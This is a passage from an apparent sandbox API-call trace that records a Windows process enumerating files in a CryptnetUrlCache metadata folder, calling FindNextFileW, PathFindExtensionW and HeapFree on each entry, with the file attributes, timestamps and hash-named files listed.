out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd48e2bf0, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0206.593] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0206.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.593] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b2324c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b2324c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b2324c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cAlternateFileName="7B8944~1")) returned 1 [0206.593] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0206.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.593] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b199f40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b199f40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b199f40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cAlternateFileName="7D266D~2")) returned 1 [0206.594] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0206.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.594] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefaf7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefaf7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaec313e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cAlternateFileName="7D266D~1")) returned 1 [0206.594] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0206.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.594] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6056b480, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6056b480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1ef687a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cAlternateFileName="8059E9~3")) returned 1 [0206.594] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0206.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.594] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x611ea800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x611ea800, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaecc9960, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cAlternateFileName="80273C~1")) returned 1 [0206.594] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0206.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.594] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58e24200, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58e24200, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9f5f40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cAlternateFileName="8059E9~2")) returned 1 [0206.594] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0206.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.594] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61236ac0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61236ac0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3b0b01a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cAlternateFileName="809279~1")) returned 1 [0206.595] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0206.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.595] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5836df00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5836df00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f739c0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cAlternateFileName="8059E9~1")) returned 1 [0206.595] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0206.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.595] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x62378a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x62378a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9a9c80, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cAlternateFileName="80E4BE~1")) returned 1 [0206.595] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0206.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.595] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x613675c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x613675c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69bba4a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cAlternateFileName="803B9E~1")) returned 1 [0206.595] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0206.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.595] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x63c50fe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63c50fe0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb100bf40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cAlternateFileName="803D37~1")) returned 1 [0206.595] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0206.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.595] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61021780, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61021780, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb1058200, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cAlternateFileName="8059E9~4")) returned 1 [0206.595] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0206.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.595] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x636a9ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x636a9ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb139e040, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cAlternateFileName="800D31~1")) returned 1 [0206.595] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0206.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.595] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x581f7ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x581f7ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f4d860, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cAlternateFileName="828298~1")) returned 1 [0206.595] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0206.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.595] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xec3c5340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec3c5340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xb16257a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cAlternateFileName="8828F3~1")) returned 1 [0206.595] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0206.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.595] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8064ac00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x8064ac00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80670d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cAlternateFileName="8828F3~2")) returned 1 [0206.596] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0206.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.596] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6aa2c0a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6aa2c0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xadf19ae0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x196, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cAlternateFileName="8E4E51~1")) returned 1 [0206.596] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0206.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.596] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbf0dd70, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0206.596] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned="" [0206.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.596] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6a83cec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a83cec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaebe5120, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cAlternateFileName="955CAB~1")) returned 1 [0206.596] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0206.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.596] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf3f73d0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf3f73d0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf3f73d0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cAlternateFileName="9BC2FF~1")) returned 1 [0206.597] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0206.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.597] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe06277d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe06277d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xb15d94e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cAlternateFileName="9C888B~1")) returned 1 [0206.597] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0206.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.597] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe07ca6f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe07ca6f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0x965accc0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cAlternateFileName="9C888B~2")) returned 1 [0206.597] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0206.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.597] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54bc3730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54bc3730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb11d4fc0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cAlternateFileName="A9E4F7~1")) returned 1 [0206.597] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0206.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.597] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bfe570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bfe570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe9b34f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cAlternateFileName="ACF244~1")) returned 1 [0206.597] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0206.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.597] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe04aaa10, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe04aaa10, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xae4e7080, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cAlternateFileName="B3BB9C~2")) returned 1 [0206.597] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0206.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.597] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefc01b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefc01b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa4ee1e0, 